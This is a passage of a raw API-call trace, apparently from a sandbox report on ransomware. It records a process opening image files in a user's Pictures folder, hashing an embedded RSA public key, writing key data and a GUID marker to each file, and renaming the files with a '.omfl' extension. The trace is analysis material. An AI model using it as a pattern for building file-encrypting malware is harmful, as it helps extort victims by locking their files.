lpNumberOfBytesWritten=0xe00fb14*=0xd958, lpOverlapped=0x0) returned 1 [0131.563] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.563] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0xd95d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.563] WriteFile (in: hFile=0x6e4, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.563] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.563] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5cf0 [0131.563] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0131.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.563] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdce69c8 [0131.563] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.563] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5cf0 | out: hHeap=0x4970000) returned 1 [0131.563] WriteFile (in: hFile=0x6e4, lpBuffer=0xdce69c8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdce69c8*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.564] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.564] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.564] WriteFile (in: hFile=0x6e4, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.564] CloseHandle (hObject=0x6e4) returned 1 [0131.566] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.566] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0131.566] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0131.566] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F7SCOhaGE9Z.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\f7scohage9z.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F7SCOhaGE9Z.bmp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\f7scohage9z.bmp.omfl")) returned 1 [0131.567] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.567] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.567] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.568] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0131.568] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde0926d0, ftCreationTime.dwHighDateTime=0x1d5e39d, ftLastAccessTime.dwLowDateTime=0x79b031f0, ftLastAccessTime.dwHighDateTime=0x1d5e00b, ftLastWriteTime.dwLowDateTime=0x79b031f0, ftLastWriteTime.dwHighDateTime=0x1d5e00b, nFileSizeHigh=0x0, nFileSizeLow=0x2059, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GqW3Nf.bmp", cAlternateFileName="")) returned 1 [0131.568] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0131.568] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0131.568] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0131.568] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GqW3Nf.bmp") returned=".bmp" [0131.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GqW3Nf.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gqw3nf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6e4 [0131.569] GetFileSizeEx (in: hFile=0x6e4, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=8281) returned 1 [0131.569] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.571] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0x2033, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.572] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.573] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.573] SetFilePointer (in: hFile=0x6e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.573] ReadFile (in: hFile=0x6e4, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x2059, lpOverlapped=0x0) returned 1 [0131.573] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.573] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.573] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.573] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0131.574] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.574] CryptHashData (hHash=0xdce3b30, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.574] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.574] CryptGetHashParam (in: hHash=0xdce3b30, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.574] GetLastError () returned 0x0 [0131.574] CryptDestroyHash (hHash=0xdce3b30) returned 1 [0131.574] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0131.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.574] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.575] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.575] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2060) returned 0x7579548 [0131.575] SetFilePointer (in: hFile=0x6e4, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34f20 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17100 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34f68 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17118 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17148 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17160 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.575] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd206b0 [0131.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17148 | out: hHeap=0x4970000) returned 1 [0131.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17160 | out: hHeap=0x4970000) returned 1 [0131.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e58 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17160 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd17148 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf068 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17160 | out: hHeap=0x4970000) returned 1 [0131.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17148 | out: hHeap=0x4970000) returned 1 [0131.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0131.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0131.576] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd206b0 | out: hHeap=0x4970000) returned 1 [0131.576] GetCurrentThreadId () returned 0x618 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.576] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2d930 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.577] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.577] GetCurrentThreadId () returned 0x618 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.577] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.577] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.577] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.577] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.577] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.577] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17148 [0131.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8a0 [0131.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17160 [0131.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0131.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd17130 [0131.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0131.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17178 [0131.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0131.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa860 [0131.578] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.578] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.579] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce8f58 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17148 | out: hHeap=0x4970000) returned 1 [0131.579] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd17148 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.579] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd206b0 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.579] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.579] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0131.579] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.579] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17148 | out: hHeap=0x4970000) returned 1 [0131.579] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0131.579] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.579] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.580] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.580] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.580] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0131.580] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.580] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.580] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17178 | out: hHeap=0x4970000) returned 1 [0131.580] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.580] SetFilePointerEx (in: hFile=0x6e4, liDistanceToMove=0x2059, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.580] WriteFile (in: hFile=0x6e4, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.580] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.580] WriteFile (in: hFile=0x6e4, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, 